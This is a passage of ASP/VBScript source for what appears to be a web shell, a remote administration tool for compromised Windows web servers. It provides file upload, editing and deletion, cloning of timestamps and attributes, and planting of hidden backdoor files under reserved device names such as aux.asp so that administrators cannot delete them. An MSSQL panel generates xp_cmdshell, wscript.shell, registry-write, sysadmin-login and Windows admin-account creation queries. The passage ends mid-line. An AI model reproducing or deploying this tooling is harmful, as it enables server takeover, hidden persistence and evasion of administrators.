		Select Case subAct
			Case"delFile","delFolder"
				delOne()
				thePath=getLeft(thePath,"\",False)
			Case"newone"
				newOne()
			Case"save","utfSave"
				saveFile()
				thePath=getLeft(thePath,"\",False)
			Case"fileUpload"
				StreamUpload()
			Case"showEdit","utfEdit"
				showEdit()
			Case"rnFile","rnFolder"
				renameOne()
				thePath=getLeft(thePath,"\",False)
			Case"cpFile","mvFile","cpFolder","mvFolder"
				moveCopyOne()
				thePath=getLeft(thePath,"\",False)
			Case"getattrib"
				getAttributes()
			Case"Setattrib"
				SetAttributes()
				thePath=getLeft(thePath,"\",False)
			Case"mkDoor"
				MakeBackDoor()
		End Select
		If Len(thePath)<3 Then thePath=thePath&"\"
		FileExplorer()
	End Sub
 
	Sub FileExplorer()
		Dim theFolder,folderId,extName,parentFolderName,objSize,fullPath,objLastModIfied,nowpath
		If Not isDebugMode Then On Error Resume Next
		If strFileMethod="fso"Then
			Set theFolder=objFso.GetFolder(thePath)
			parentFolderName=objFso.GetParentFolderName(thePath)
		Else
			Set theFolder=objSa.NameSpace(thePath)
			dieErr Err
			parentFolderName=getLeft(thePath,"\",False)
			If InStr(parentFolderName,"\")<1 Then
				parentFolderName=parentFolderName&"\"
			End If
		End If
		nowpath=thePath
		If Right(nowpath,1)<>"\"Then nowpath=nowpath&"\"
		doHidden"nowPath",nowpath
		doForm True
		echo"<b>Current Path :</b>"
		doInput"text","thePath",thePath,120,""
		echoLine""
		doSelect"","170px","onchange=""javascript:if(this.value!=''){dosubmit('"&goaction&"','',this.value);}"""
		doOption"","Drivers/Comm folders"
		doOption htmlEnc(mapath(".")),"."
		doOption htmlEnc(mapath("/")),"/"
		doOption"","----------------"
		If Lcase(strFileMethod)="fso"Then
			For Each drive In objFso.Drives
				doOption drive.DriveLetter&":\",drive.DriveLetter&":\"
			Next
			doOption"","----------------"
		End If
		doOption"C:\Program Files","C:\Program Files"
		doOption"C:\Program Files\RhinoSoft.com","RhinoSoft.com"
		doOption"C:\Program Files\Serv-U","Serv-U"
		doOption"C:\Program Files\Radmin","Radmin"
		doOption"C:\Program Files\Microsoft SQL Server","Mssql"
		doOption"C:\Program Files\Mysql","Mysql"
		doOption"","----------------"
		doOption"C:\Documents and Settings\All Users","All Users"
		doOption"C:\Documents and Settings\All Users\Documents","Documents"
		doOption"C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere","PcAnywhere"
		doOption"C:\Documents and Settings\All Users\Start Menu\Programs","Start Menu->Programs"
		doOption"","----------------"
		doOption"D:\Program Files","D:\Program Files"
		doOption"D:\Serv-U","D:\Serv-U"
		doOption"D:\Radmin","D:\Radmin"
		doOption"D:\Mysql","D:\Mysql"
		doSselect
		doSubmit"Go"
		doFform
		echoLine"<br><form method=""post"" id=""upform""action="""&pagePath&"""enctype=""multipart/form-data"">"
		doHidden"subAct","fileUpload"
		doHidden"thePath",thePath
		doTable"60%"
		doTr 1
		doTdInput"file","upfile","","30%","",""
		doTd"Save As :","15%"
		doTdInput"text","destName","","30%","",""
		doTdInput"button",""," Upload  ","20%","onClick=""javascript:dosubmit('"&goaction&"','fileUpload','')""",""
		doTtr
		doFform
		If strFileMethod="fso"Then
			doTr 0
			doForm True
			doHidden"thePath",thePath
			doHidden"subAct","newone"
			doTdInput"text","newOneName","","","",""
			echo"<td colspan='2'>"
			doInput"radio","newOneType","file","","checked"
			echo"File"
			doInput"radio","newOneType","folder","",""
			echo"Folder</td>"
			doTdSubmit"New one",""
			'doTdInput"button","makedoor","Make backdoor","","onClick=""javascript:dosubmit('"&goaction&"','mkDoor','"&doPathFormat(thePath)&"')""",""
			doFform
			doTtr
		End If
		echo"</table><hr>"
		If strFileMethod="fso"Then
			If Not objFso.FolderExists(thePath)Then
				errMsgAdd thePath&" Folder dosen't exists or access denied!"
				doFin
			End If
		End If
		doShowHideme"Folders",False
		doTable"100%"
		doTh
		doTd"<b>Folder name</b>",""
		doTd"<b>Size</b>",""
		doTd"<b>Last modIfied</b>",""
		echo"<td><b>Action</b>"
		If strFileMethod="fso"Then 
			echo" - "
			doSubHref goaction,"mkDoor",doPathFormat(thePath),"Make a hidden backdoor here",""
		End If
		echo"</td>"
		doTtr
		doTr 0
		echo"<td colspan=""4"">"
		doSubHref goaction,"",doPathFormat(parentFolderName),"Parent Directory",""
		echo"</td>"
		doTtr
		trId=1
		If strFileMethod="fso"Then
			For Each objX In theFolder.SubFolders
				objLastModIfied=objX.DateLastModIfied
				doTr trId
				echo"<td>"
				doSubHref goaction,"",objX.Name,objX.Name,""
				echo"</td>"
				doTd htmlEnc("<dir>"),""
				doTd objLastModIfied,""
				echo"<td>"
				doSubHref goaction,"cpFolder",objX.Name,"Copy"," -"
				doSubHref goaction,"mvFolder",objX.Name,"Move"," -"
				doSubHref goaction,"rnFolder",objX.Name,"Rename"," -"
				doSubHref "AddToMdb","fsoPack",objX.Name,"Package"," -"
				doSubHref goaction,"delFolder",objX.Name,"Delete",""
				echoLine"</td>"
				doTtr
				trIdAdd
			Next
		Else
			For Each objX In theFolder.Items
				If objX.IsFolder Then
					objLastModIfied=theFolder.GetDetailsOf(objX,3)
					doTr trId
					echo"<td>"
					doSubHref goaction,"",objX.Name,objX.Name,""
					echo"</td>"
					doTd htmlEnc("<dir>"),""
					doTd objLastModIfied,""
					echo"<td>"
					doSubHref goaction,"rnFolder",objX.Name,"Rename"," -"
					doSubHref "AddToMdb","appPack",objX.Name,"Package",""
					echoLine"</td>"
					doTtr
					trIdAdd
				End If
			Next
		End If
		doTtable
		echoLine"</span><br>"
		doShowHideme"Files",False
		doTable"100%"
		echo"<b>"
		doTh
		doTd"<b>File name</b>",""
		doTd"<b>Size</b>",""
		doTd"<b>Last modIfied</b>",""
		doTd"<b>Action</b>",""
		doTtr
		echo"</b>"
		trId=0
		If strFileMethod="fso"Then
			For Each objX In theFolder.Files
				objSize=GetTheSize(objX.Size)
				objLastModIfied=objX.DateLastModIfied
				If Lcase(Left(objX.Path,Len(rootPath)))<>Lcase(rootPath) Then
					folderId=""
				Else
					folderId=Replace(Replace(UrlEnc(Mid(objX.Path,Len(rootPath)+1)),"%2E","."),"+","%20")
				End If
				doTr trId
				If folderId=""Then
					doTd objX.Name,""
				Else
					doTd"<a href='"&Replace(folderId,"%5C","/")&"' target=_blank>"&objX.Name&"</a>",""
				End If
				doTd objSize,""
				doTd objLastModIfied,""
				echo"<td>"
				doSubHref goaction,"showEdit",objX.Name,"Edit"," -"
				doSubHref goaction,"cpFile",objX.Name,"Copy"," -"
				doSubHref goaction,"mvFile",objX.Name,"Move"," -"
				doSubHref goaction,"rnFile",objX.Name,"Rename"," -"
				doSubHref goaction,"down",objX.Name,"Down"," -"
				doSubHref goaction,"getattrib",objX.Name,"Attributes"," -"
				doSqlHref "showTables",objX.Name,"","","","Database"," -"
				doSubHref goaction,"delFile",objX.Name,"Delete",""
				echoLine"</td>"
				doTtr
				trIdAdd
			Next
		Else
			For Each objX In theFolder.Items
				If Not objX.IsFolder Then
					Dim fName
					fName=getRight(objX.Path,"\")
					fullPath=doPathFormat(objX.Path)
					objSize=theFolder.GetDetailsOf(objX,1)
					objLastModIfied=theFolder.GetDetailsOf(objX,3)
					If Lcase(Left(objX.Path,Len(rootPath)))<>Lcase(rootPath) Then
						folderId=""
					Else
						folderId=Replace(Replace(UrlEnc(Mid(objX.Path,Len(rootPath)+1)),"%2E","."),"+","%20")
					End If
					doTr trId
					If folderId=""Then
						doTd getRight(objX.Path,"\"),""
					Else
						doTd"<a href='"&Replace(folderId,"%5C","/")&"' target=_blank>"& getRight(objX.Path,"\")&"</a>",""
					End If
					doTd objSize,""
					doTd objLastModIfied,""
					echo"<td>"
					doSubHref goaction,"showEdit",fName,"Edit"," -"
					doSubHref goaction,"rnFile",fName,"Rename"," -"
					doSubHref goaction,"down",fName,"Down"," -"
					doSubHref goaction,"getattrib",fName,"Attributes"," -"
					doSqlHref "showTables",fName,"","","","Database",""
					echoLine"</td>"
					doTtr
					trIdAdd
				End If
			Next
		End If
		doTtable
		echo"</span>"
		chkerr(Err)
	End Sub
 
	Sub getAttributes()
		Dim fsoTheFile,appTheFile,strName,strAtt,intValue,objFolder,strPth,refName
		If Not isDebugMode Then On Error Resume Next
		If IsObject(objFso)Then
			Set fsoTheFile=objFso.GetFile(thePath)
		End If
		If IsObject(objSa)Then
			strPth=getLeft(thePath,"\",False)
			strName=getRight(thePath,"\")
			Set objFolder=objSa.NameSpace(strPth)
			Set appTheFile=objFolder.ParseName(strName)
		End If
		echo"<center>"
		doTable"60%"
		doForm True
		doHidden"subAct","Setattrib"
		doHidden"thePath",thePath
		doTr 1
		doTdSubmit"Set / Clone",""
		doTd thePath,""
		doTtr
		doTr 0
		doTd"Attributes",""
		If IsObject(objFso)Then
			intValue=fsoTheFile.Attributes
			strAtt="<input type=checkbox name=fsoAttrib value=4 class='input' {$system}>system "
			strAtt=strAtt&"<input type=checkbox name=fsoAttrib value=2 class='input' {$hidden}>hide "
			strAtt=strAtt&"<input type=checkbox name=fsoAttrib value=1 class='input' {$readonly}>readonly "
			strAtt=strAtt&"<input type=checkbox name=fsoAttrib value=32 class='input' {$archive}>save "
			If intValue>=128 Then intValue=intValue-128
			If intValue>=64 Then intValue=intValue-64
			If intValue>=32 Then
				intValue=intValue-32
				strAtt=Replace(strAtt,"{$archive}","checked")
			End If
			If intValue>=16 Then intValue=intValue-16
			If intValue>=8 Then intValue=intValue-8
			If intValue>=4 Then
				intValue=intValue-4
				strAtt=Replace(strAtt,"{$system}","checked")
			End If
			If intValue>=2 Then
				intValue=intValue-2
				strAtt=Replace(strAtt,"{$hidden}","checked")
			End If
			If intValue>=1 Then
				intValue=intValue-1
				strAtt=Replace(strAtt,"{$readonly}","checked")
			End If
			doTd strAtt,""
		Else
			doTd"FSO object disabled,can't get/Set attributes -_-~!",""
		End If
		doTtr
		If IsObject(objSa)Then
			doTr 1
			doTd"Date created",""
			doTd objFolder.GetDetailsOf(appTheFile,4),""
			doTtr
			doTr 0
			doTd"Date last modIfied",""
			doTdInput"text","datem",objFolder.GetDetailsOf(appTheFile,3),"","",""
			doTtr
			doTr 1
			doTd"Date last accessed",""
			doTd objFolder.GetDetailsOf(appTheFile,5),""
			doTtr
		Else
			doTr 1
			doTd"Date created",""
			doTd fsoTheFile.DateCreated,""
			doTtr
			doTr 0
			doTd"Date last modIfied",""
			doTd fsoTheFile.DateLastModIfied,""
			doTtr
			doTr 1
			doTd"Date last accessed",""
			doTd fsoTheFile.DateLastAccessed,""
			doTtr
		End If
		doTr 0
		If IsObject(objSa)Then
			doTd"Clone time ",""
			echo"<td>"
			doSelect"strRefFile","100%",""
			doOption "","Do not clone"
			For Each objX In objFolder.Items
				If Not objX.IsFolder Then
					refName=getRight(objX.Path,"\")
					doOption refName,objFolder.GetDetailsOf(objFolder.ParseName(refName),3)&" --- "&refName
				End If
			Next
		Else
			echo"<td colspan=2>App object disabled,can't modIfy time -_-~!</td>"
		End If
		doTtable
		doFform
		doFin()
	End Sub
	Sub SetAttributes()
		If Not isDebugMode Then On Error Resume Next
		Dim myAttributes,fsoTheFile,strPth,strName,objFolder,appTheFile
		If IsObject(objFso)Then
			Set fsoTheFile=objFso.GetFile(thePath)
		End If
		If IsObject(objSa)Then
			strPth=getLeft(thePath,"\",False)
			strName=getRight(thePath,"\")
			Set objFolder=objSa.NameSpace(strPth)
			Set appTheFile=objFolder.ParseName(strName)
		End If
		If fsoAttrib<>""Then
			fsoAttrib=Split(Replace(fsoAttrib," ",""),",")
			For i=0 To UBound(fsoAttrib)
				myAttributes=myAttributes+CInt(fsoAttrib(i))
			Next
			fsoTheFile.Attributes=myAttributes
			If Err Then
				chkErr(Err)
			Else
				errMsgAdd"Attributes modIfied"
			End If
		End If
		If strRefFile=""Then
			If datem<>"" And IsDate(datem)Then
				appTheFile.ModIfyDate=datem
				If Err Then
					chkErr(Err)
				Else
					errMsgAdd"Time modIfied"
				End If
			End If
		Else
			appTheFile.ModIfyDate=objFolder.GetDetailsOf(objFolder.ParseName(strRefFile),3)
			If Err Then
				chkErr(Err)
			Else
				errMsgAdd"Time modIfied"
			End If
		End If
	End Sub
	Sub MakeBackDoor()
		If fileName<>""Then
			Dim savePath,fTheFile
			savePath="\\.\"&thePath&"\"&fileName
			If moveme=1 Then
				Call objFso.MoveFile(getServerVariable("PATH_TRANSLATED"),savePath)
				Set fTheFile=objFso.GetFile(savePath)
				fTheFile.Attributes=6
				Response.Redirect(fileName)
			Else
				fsoSaveToFile savePath,fileContent
				Set fTheFile=objFso.GetFile(savePath)
				fTheFile.Attributes=6
			End If
			If Err Then
				chkErr(err)
			Else
				errMsgAdd("Backdoor established,have fun.")
			End If
			Exit Sub
		End If
		doForm True
		doTable"100%"
		doHidden"subAct","mkDoor"
		echoLine"<b>Make hidden backdoor</b><br>"
		doTable"100%"
		doTr 1
		doTd"Path","20%"
		doTdInput"text","thePath",thePath,"60%","",""
		doTdSubmit"Save","20%"
		doTtr
		doTr 0
		doTd"Content",""
		doTdText "fileContent","",10
		echo"<td>"
		doChkBox"moveme",1,"Move myself there","onclick='javascript:document.getElementById(""fileContent"").disabled=this.checked'"
		echo"</td>"
		doTtr
		doTr 1
		echo"<td>"
		doSelect"fileName","100%",""
		doOption"aux.asp","aux.asp"
		doOption"con.asp","con.asp"
		doOption"com1.asp","com1.asp"
		doOption"com2.asp","com2.asp"
		doOption"nul.asp","nul.asp"
		doOption"prn.asp","prn.asp"
		doSselect
		echo"</td>"
		echoLine"<td colspan='2'>Cannot del,cannot open in ordinary way,this will drive the web administrator madness :)</td>"
		doTtr
		doTtable
		doFform
		doFin
	End Sub
 
	Sub PageMsDataBase()
		If Not isDebugMode Then On Error Resume Next
		If connStr=""Then connStr=Request.Cookies(cookiePre&"connStr")
		ShowDBTool()
		If connStr<>""Then
			Select Case subAct
				Case"showQuery"
					showQuery()
				Case"delTable"
					delTable()
				Case"expTable"
					expTable()
				Case"saup","sadown"
					saFile()
				Case Else
					showTables()
			End Select
		End If
		DestoryConn
		doFin
	End Sub
 
	Sub ShowDBTool()
		Dim rs,rolearr,strfuncs,showfuncs
		If Not isDebugMode Then On Error Resume Next
		showTitle("Database Operation")
		doForm True
		echoLine"Connect String : "
		doInput"text","connStr",connStr,160,""
		echo" "
		doSubmit"OK"
		doFform
		doShowHideMe"GetConnectString",True
		doTable"100%"
		doTr 1
		doTd"SqlOleDb","10%"
		echoLine"<td style=""width:80%"">Server:"
		doInput"text","MsServer","127.0.0.1","15",""
		echo" Username:"
		doInput"text","MsUser","sa","10",""
		echo" Password:"
		doInput"text","MsPass","","10",""
		echo" DataBase:"
		doInput"text","DBPath","","10",""
		echo"</td>"
		doTdInput"button","","Generate","10%","onClick=""javascript:getconnStr(MsServer.value,MsUser.value,MsPass.value,DBPath.value)""",""
		doTtr
		doTr 0
		doTd"Jet",""
		echoLine"<td>DB path:"
		doInput"text","accdbpath",aspPath&"\","82",""
		echo"</td>"
		doTdInput"button","","Generate","10%","onClick=""javascript:getAccStr(accdbpath.value)""",""
		doTtr
		doTtable
		echo"</span><hr>"
		If Err Then Err.clear
		If connStr<>""Then
			CreateConn connStr
			Response.Cookies(cookiePre&"connStr")=connStr
			Set rs=CreateObj("Adodb.RecordSet")
			rs.Open "select @@version,db_name()",conn,1,1
			If Err Then
				dbType="access"
				Err.clear
				Set rs=Nothing
				Set rs=CreateObj("Adodb.RecordSet")
				rs.Open "select cstr('access')",conn,1,1
				If Err Then
					dbType="others"
					Err.clear
				End If
				rs.Close
				Set rs=Nothing
			Else
				sqlver=rs(0)
				dbname=rs(1)
				rs.close
				dbType="mssql"
%>
	<script language=vbscript>
				Function getRegPath(path)
					Dim regRoot,regPath,regKey
					regRoot=getLeft(path,"\",True)
					path=Mid(path,Len(regRoot)+2)
					regKey=getRight(path,"\")
					regPath=getLeft(path,"\",False)
					getRegPath=Array(regRoot,regPath,regKey)
				End Function
				Function doXpStr(xpcmdstr)
					form2.queryStr.value="exec master..xp_cmdshell '"&xpcmdstr&"'"
				End Function
				Function doRegStr(regpath)
					Dim regarr
					regarr=getRegPath(regpath)
					form2.queryStr.value="exec master..xp_regread '"&regarr(0)&"','"&regarr(1)&"','"&regarr(2)&"'"
				End Function
				Function doXpDirStr(xpdirstr)
					form2.queryStr.value="exec master..xp_dirtree '"&xpdirstr&"',1,1"
				End Function
				Function doSpStr(spstr,sptemp,spstep)
					If spstep=2 Then
						form2.queryStr.value="If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"&sptemp&"'"
					Else
						form2.queryStr.value="declare @a int;exec master..sp_oacreate'wscript.shell',@a output;exec master..sp_oamethod @a,'run',null,'"&spstr&" > "&sptemp&"',0,'true'"
					End If
				End Function
				Function doBoxStr(boxstr,boxpath,boxtemp,boxstep)
					Select Case boxstep
						Case 1
							form2.queryStr.value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0"
						Case 2
							boxstr=Replace(boxstr,"""","""""")
							form2.queryStr.value="Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database="&boxpath&"','select shell("""&boxstr&" > "&boxtemp&""")')"
						Case 3
							form2.queryStr.value="If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"&boxtemp&"'"
					End Select
				End Function
				Function doFsoStr(fsoori,fsotag)
					form2.queryStr.value="declare @a int;exec master..sp_oacreate'Scripting.FileSystemObject',@a output;exec master..sp_oamethod @a,'CopyFile',null,'"&fsoori&"','"&fsotag&"'"
				End Function
				Function doMakeCab(cabori,cabtag)
					form2.queryStr.value="exec master..xp_makecab 'C:\windows\temp\~098611.tmp','default',1,'"&cabori&"';exec master..xp_unpackcab 'C:\windows\temp\~098611.tmp','"&getLeft(cabtag,"\",False)&"',1,'"&getRight(cabtag,"\")&"'"
				End Function
				Function doAddSp(addsptag,addspdll)
					form2.queryStr.value="Use master;dbcc addextEndedproc('"&addsptag&"','"&addspdll&"')"
				End Function
				Function doDelSp(delsptag)
					form2.queryStr.value="Use master;dbcc dropextEndedproc('"&delsptag&"')"
				End Function
				Function doEnableSp(ensptag)
					form2.queryStr.value="EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure '"&ensptag&"',1;RECONFIGURE"
				End Function
				Function doRegWrite(rwpath,rwtype,rwvalue)
					Dim regarr
					regarr=getRegPath(rwpath)
					form2.queryStr.value="exec master..xp_regwrite '"&regarr(0)&"','"&regarr(1)&"','"&regarr(2)&"','"&rwtype&"','"&rwvalue&"'"
				End Function
				Function doAddLogin(name,pass)
					form2.queryStr.value="exec master..sp_addlogin '"&name&"','"&pass&"';exec master..sp_addsrvrolemember '"&name&"','sysadmin'"
				End Function
				Function doAddSysUser(name,pass)
					form2.queryStr.value="declare @a int;exec master..sp_oacreate 'ScriptControl',@a output;exec master..sp_oasetproperty @a,'language','VBScript';exec master..sp_oamethod @a,'addcode',null,'sub add():Set o=CreateObject(""Shell.Users""):Set u=o.create("""&name&"""):u.changePassword """&pass&""","""":u.setting(""AccountType"")=3:end sub';exec master..sp_oamethod @a,'run',null,'add'"
				End Function
				Function doLogBackup(logcontent,logpath,dbname,stepp)
					Select Case stepp
						Case 1
							form2.queryStr.value="alter database "&dbname&" Set recovery full;dump transaction "&dbname&" with no_log;If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa sql_variant primary key)"
						Case 2
							form2.queryStr.value="backup database "&dbname&" to disk='C:\windows\temp\~098611.tmp' with init"
						Case 3
							form2.queryStr.value="insert dark_temp values('"&Replace(logcontent,"'","''")&"')"
						Case 4
							form2.queryStr.value="backup log "&dbname&" to disk='"&logpath&"';drop table dark_temp"
					End Select
				End Function
				Function chgDb(dbname)
					On Error Resume Next
					Dim regex,olddb
					Set regex=new RegExp
					regex.Global=True
					regex.IgnoreCase=True
					regex.MultiLine=True
					regex.Pattern="(Database|Initial Catalog) *=[^;]+"
					If regex.test(sqlForm.connStr.value)Then
						sqlForm.connStr.value=secretEncode(regex.Replace(sqlForm.connStr.value,"$1="&dbname))
						sqlForm.subAct="showTables"
						sqlForm.submit
					Else
						Window.alert("Can not get database name in connect string!")
					End If
				End Function
				Function getLeft(str,sign,fromLeft)
					If str="" Or InStr(str,sign)<1 Then
						getLeft=""
						Exit Function
					End If
					If fromLeft Then
						getLeft=Left(str,InStr(str,sign)-1)
					Else
						getLeft=Left(str,InstrRev(str,sign)-1)
					End If
				End Function
				Function getRight(str,sign)
					If str="" Or InStr(str,sign)<1 Then
						getRight=""
						Exit Function
					End If
					getRight=Mid(str,InstrRev(str,sign)+Len(sign))
				End Function
	</script>
<%
			End If
			If subAct="showQuery"And queryStr=""Then
				If dbType="others"Then
					queryStr="select * from "&strTable
				Else
					queryStr="select * from ["&strTable&"]"
				End If
			End If
			doSqlHref "showTables","","","","","Show Tables",""
			echo"<br>"
			doForm True
			doHidden"subAct","showQuery"
			doHidden"connStr",connStr
			doTable"100%"
			If dbType="mssql"Then
				doTr 1
				echoLine"<td colspan=3>Version : "&htmlEnc(sqlver)&"</td>"
				doTtr
				rolearr="sysadmin|db_owner|public"
				doTr 0
				echo"<td colspan=3>"
				For Each strrole In Split(rolearr,"|")
					If strrole="sysadmin"Then
						rs.Open "select IS_SRVROLEMEMBER('"&strrole&"')",conn,1,1
					Else
						rs.Open "select IS_ROLEMEMBER('"&strrole&"')",conn,1,1
					End If
					If rs(0)=1 Then
						echo "Current ServerRole : <font color='red'>"&strrole&"</font> "
						rs.close
						Exit For
					End If
					rs.close
				Next
				echo "| Switch Database : "
				rs.Open "select name from master..sysdatabases",conn,1,1
				rs.movefirst
				Do While Not rs.eof
					echo "<a href=javascript:chgDb('"&rs("name")&"')>"&rs("name")&"</a> | "
					rs.movenext
				Loop
				echo"</td></tr>"
				trIdAdd
				rs.close
				Set rs=Nothing
			End If
			doTr 1
			doTd"Execute Sql","10%"
			doTdText"queryStr",queryStr,5
			doTdSubmit"Submit","10%"
			doTtr
			doTtable
			doFform
			If dbType="mssql"Then
				echo"Functions : "
				strfuncs=Split("xp_cmd|xp_dir|xp_reg|xp_regw|wsexec|sbexec|fsocopy|makecab|addproc|delproc|enfunc|addlogin|addsys|logback|saup|sadown","|")
				showfuncs=Split("xp_cmdshell|xp_dirtree|xp_regread|xp_regwrite|ws exec|sandbox exec|FSO copy|Cab copy|add procedure|del procedure|enable function|add sql user|add sys user|logbackup|saupfile|sadownfile","|")
				For i=0 To UBound(strfuncs)
					echo"<a href='#' onClick=""javascript:showHideMe("&strfuncs(i)&")"" class='hidehref'>"&showfuncs(i)&"</a> | "
				Next
				echo"<br><br>"
				doHideSpan"xp_cmd",True
				doTable"100%"
				doTr 1
				doTd"Command","10%"
				doTdInput"text","xpcmdstr","net user","80%","",""
				doTdInput"button","","Generate","10%","onClick=""javascript:doXpStr(xpcmdstr.value)""",""
				doTtr
				doTtable
				echo"</span>"
				doHideSpan"xp_dir",True
				doTable"100%"
				doTr 1
				doTd"Path","10%"
				doTdInput"text","xpdirstr",aspPath,"80%","",""
				doTdInput"button","","Generate","10%","onClick=""javascript:doXpDirStr(xpdirstr.value)""",""
				doTtr
				doTtable
				echo"</span>"
				doHideSpan"xp_reg",True
				doTable"100%"
				doTr 1
				doTd"Path","10%"
				doTdInput"text","xpregpath","HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Co